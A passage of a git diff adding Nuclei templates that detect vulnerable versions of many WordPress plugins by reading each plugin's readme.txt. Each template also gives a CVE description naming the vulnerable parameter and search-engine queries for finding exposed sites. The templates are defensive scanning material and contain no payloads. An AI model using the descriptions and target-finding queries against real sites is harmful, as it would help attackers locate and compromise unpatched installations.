+ - 200
+
+ - type: word
+ words:
+ - "wp-hide-security-enhancer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml b/poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml
new file mode 100644
index 0000000000..355fc0aedd
--- /dev/null
+++ b/poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6
+
+info:
+ name: >
+ Next-Cart Store to WooCommerce Migration <= 3.9.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/abcebcdb-e22a-4b6c-86db-f95b00260446?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11687
+ metadata:
+ fofa-query: "wp-content/plugins/nextcart-woocommerce-migration/"
+ google-query: inurl:"/wp-content/plugins/nextcart-woocommerce-migration/"
+ shodan-query: 'vuln:CVE-2024-11687'
+ tags: cve,wordpress,wp-plugin,nextcart-woocommerce-migration,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/nextcart-woocommerce-migration/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "nextcart-woocommerce-migration"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.9.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml b/poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
new file mode 100644
index 0000000000..c7755d3077
--- /dev/null
+++ b/poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53c18834-3026-4d4d-888b-add314a0e56e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11728
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11728'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml b/poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml
new file mode 100644
index 0000000000..07eeacc89a
--- /dev/null
+++ b/poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11729-fc3745f8e039decbc81308be45aacd79
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Subscriber+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'service_list[0][service_id]' parameter of the get_widget_payment_options AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/86632212-37b5-4280-8a2a-163957ad9787?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-11729
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11729'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml b/poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml
new file mode 100644
index 0000000000..3f957bd372
--- /dev/null
+++ b/poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Doctor/Receptionist+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'sort[]' parameter of the static_data_list AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with doctor/receptionist-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-11730
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11730'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11779.yaml b/poc/cve/CVE-2024-11779.yaml
new file mode 100644
index 0000000000..d6a26681ed
--- /dev/null
+++ b/poc/cve/CVE-2024-11779.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11779
+
+info:
+ name: >
+ WIP WooCarousel Lite <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WIP WooCarousel Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wip_woocarousel_products_carousel' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11779
+ metadata:
+ fofa-query: "wp-content/plugins/wip-woocarousel-lite/"
+ google-query: inurl:"/wp-content/plugins/wip-woocarousel-lite/"
+ shodan-query: 'vuln:CVE-2024-11779'
+ tags: cve,wordpress,wp-plugin,wip-woocarousel-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wip-woocarousel-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wip-woocarousel-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml b/poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
new file mode 100644
index 0000000000..acfed4a378
--- /dev/null
+++ b/poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2
+
+info:
+ name: >
+ Folder Gallery <= 1.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Folder Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'foldergallery' shortcode in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11823
+ metadata:
+ fofa-query: "wp-content/plugins/folder-gallery/"
+ google-query: inurl:"/wp-content/plugins/folder-gallery/"
+ shodan-query: 'vuln:CVE-2024-11823'
+ tags: cve,wordpress,wp-plugin,folder-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/folder-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "folder-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml b/poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
new file mode 100644
index 0000000000..ea24cc9add
--- /dev/null
+++ b/poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12003-f77c04413b23540455a2432d7e006cc4
+
+info:
+ name: >
+ WP System <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the generate_wp_system_page_content() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12003
+ metadata:
+ fofa-query: "wp-content/plugins/wp-system/"
+ google-query: inurl:"/wp-content/plugins/wp-system/"
+ shodan-query: 'vuln:CVE-2024-12003'
+ tags: cve,wordpress,wp-plugin,wp-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml b/poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml
new file mode 100644
index 0000000000..d5378f4e66
--- /dev/null
+++ b/poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6
+
+info:
+ name: >
+ Message Filter for Contact Form 7 <= 1.6.3 - Missing Authorization to Authenticated (Subscriber+) Filter Updates/Deletions
+ author: topscoder
+ severity: low
+ description: >
+ The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the updateFilter() and deleteFilter() functions in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to update and delete filters.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12027
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-message-filter/"
+ google-query: inurl:"/wp-content/plugins/cf7-message-filter/"
+ shodan-query: 'vuln:CVE-2024-12027'
+ tags: cve,wordpress,wp-plugin,cf7-message-filter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-message-filter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml b/poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml
new file mode 100644
index 0000000000..09d49a755b
--- /dev/null
+++ b/poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b
+
+info:
+ name: >
+ Friends <= 3.2.1 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The Friends plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to send arbitrary friend requests on behalf of another website, accept the friend request for the targeted website, and then communicate with the site as an accepted friend.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-12028
+ metadata:
+ fofa-query: "wp-content/plugins/friends/"
+ google-query: inurl:"/wp-content/plugins/friends/"
+ shodan-query: 'vuln:CVE-2024-12028'
+ tags: cve,wordpress,wp-plugin,friends,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/friends/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "friends"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml b/poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml
new file mode 100644
index 0000000000..e5ca86e4ff
--- /dev/null
+++ b/poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Media Optimizer (.webp) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpmowebp-css-resources’ and 'wpmowebp-js-resources' parameters in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12060
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:CVE-2024-12060'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml b/poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml
new file mode 100644
index 0000000000..909b18140c
--- /dev/null
+++ b/poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa
+
+info:
+ name: >
+ Gold Addons for Elementor <= 1.3.2 - Missing Authorization to Authenticated (Subscriber+) License Activation/Deactivation
+ author: topscoder
+ severity: low
+ description: >
+ The Gold Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate() and deactivate() functions in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate and deactivate licenses.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12110
+ metadata:
+ fofa-query: "wp-content/plugins/gold-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/gold-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-12110'
+ tags: cve,wordpress,wp-plugin,gold-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gold-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gold-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml b/poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml
new file mode 100644
index 0000000000..a31de04437
--- /dev/null
+++ b/poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832
+
+info:
+ name: >
+ SV100 Companion <= 2.0.02 - Missing Authorization to Unuathenticated Arbitrary Options Update
+ author: topscoder
+ severity: high
+ description: >
+ The SV100 Companion plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the settings_import() function in all versions up to, and including, 2.0.02. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-12155
+ metadata:
+ fofa-query: "wp-content/plugins/sv100-companion/"
+ google-query: inurl:"/wp-content/plugins/sv100-companion/"
+ shodan-query: 'vuln:CVE-2024-12155'
+ tags: cve,wordpress,wp-plugin,sv100-companion,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sv100-companion/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sv100-companion"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.02')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml b/poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
new file mode 100644
index 0000000000..e491cf118e
--- /dev/null
+++ b/poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21
+
+info:
+ name: >
+ Pretty Simple Popup Builder <= 1.0.9 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Pretty Simple Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9489f066-5898-4908-b3aa-cf856958cb4e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-39626
+ metadata:
+ fofa-query: "wp-content/plugins/pretty-simple-popup-builder/"
+ google-query: inurl:"/wp-content/plugins/pretty-simple-popup-builder/"
+ shodan-query: 'vuln:CVE-2024-39626'
+ tags: cve,wordpress,wp-plugin,pretty-simple-popup-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pretty-simple-popup-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pretty-simple-popup-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml b/poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml
new file mode 100644
index 0000000000..b37f170d55
--- /dev/null
+++ b/poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-4271-7e84de8005b7402b3460842595eb6a21
+
+info:
+ name: >
+ SVGator – Add Animated SVG Easily <= 1.2.6 - Authenticated (Author+) Stored Cross-Site Scripting via SVG
+ author: topscoder
+ severity: low
+ description: >
+ The SVGator – Add Animated SVG Easily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
